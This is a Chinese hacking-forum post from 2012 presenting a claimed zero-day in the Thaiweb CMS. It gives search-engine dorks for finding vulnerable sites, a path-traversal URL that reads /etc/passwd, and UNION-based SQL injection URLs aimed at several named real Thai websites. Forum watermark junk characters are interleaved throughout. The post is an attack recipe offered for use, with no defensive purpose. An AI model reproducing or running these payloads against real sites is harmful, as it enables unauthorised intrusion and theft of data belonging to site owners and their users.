找回密码
 立即注册
查看: 2453|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
2 L) [6 J" ?' O4 Q* A6 Z5 L& L9 z9 k1 c  B- }
intext:powered by Thaiweb
$ G1 o) s- n8 ?7 u: g0 }8 Z7 z+ T; p2 h- I/ y8 C4 A8 k# X0 @
inurl:index.php?page=board.php
% r0 k5 W$ d& H2 I; h& c7 G$ H: \% u) Q

8 V: q- O4 i! b& S* y# O- }/ ]
" M( K" z6 |7 u- G8 W& ~利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd" i/ S( q1 E5 l8 R

$ l; G# s$ a: S6 i2 ^  K$ X7 R
: }* ?! r' ]$ v' ]
9 q5 g" B& s4 Z4 f) ?4 m利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
5 s  |" o% D' `8 b+ T
8 e6 P0 h1 F. }& {6 g
2 B( P0 y% e$ r! ?
6 K8 C$ [7 b! i: M+ Khttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--0 }% Y) \& d3 o* B  |* N
6 d9 x4 W, t; O* Z8 {  s
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--- ^+ x7 M% W# o" [! v

- n6 M9 V- O: K7 F% ihttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
( X# i9 g0 T7 ~" S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表